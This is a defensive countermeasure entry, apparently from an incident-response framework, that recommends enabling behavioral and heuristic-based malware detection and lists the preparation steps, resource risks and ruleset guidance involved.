Details

• ID: CM0021
• Version: 1.0
• Created: 14 March 2025
• Modified: 14 March 2025
• Type: Enable
• Status: Active

Intended Outcome

Enabling behavioral and heuristic-based malware detection detects adversary execution of malicious code.

Introduction

Behavioral and heuristic-based malware detection software employs methods beyond the identification of specific file signatures or hashes to alert on and react to malware and malicious behavior. These methods rely on either a rules-based or weight-based approach. Behavioral-based approaches typically detect anomalous behaviors such as unusual network traffic, abnormal file access patterns, system events, and/or atypical process behavior. Heuristic methods use data mining and machine learning to analyze features such as API calls, Operational Code, N-Grams, and Control Graph Flow.

Preparation

• Understand the scope and responsibilities of the hunt.
• Determine whether additional resources or tooling will need to be allocated, provisioned, or acquired to enhance hunt practices.
• Prepare and document clear policies and procedures for investigating and handling malware samples and compromised systems.

Risks

• This countermeasure may result in excessive resource use.
• Deploying new tools may result in a labor-intensive integration effort, while deploying new rulesets may require careful tuning and updates. This may overburden responders and operators.
• The tools may consume excessive amounts of CPU or memory on workstations, degrading performance.
• Assess the impact of deploying new tools before large-scale deployments.

Guidance

• While deploying malware detection tools may often be thought of as strictly a preventative measure, leveraging them during incident response to alert on recently observed behaviors can still prove valuable for acquiring greater visibility into potential living-off-the-land techniques subsequently executed by the adversary.

• Security operations should update their behavioral rulesets with new alerts based on observed adversary activities, malware behaviors in detonation chambers, or recommendations made from the security community.

• Step-by-step instructions for deploying new detection tools and technologies in the aftermath of an incident is beyond the scope of this countermeasure. Security operators should reflect on their unique organizational requirements and consult with the appropriate experts and vendors to enhance their security when considering new heuristic and behavioral technologies following an incident.

References

• Accuracy, Precision, Recall or F1? | https://towardsdatascience.com/accuracy-precision-recall-or-f1-331fb37c5cb9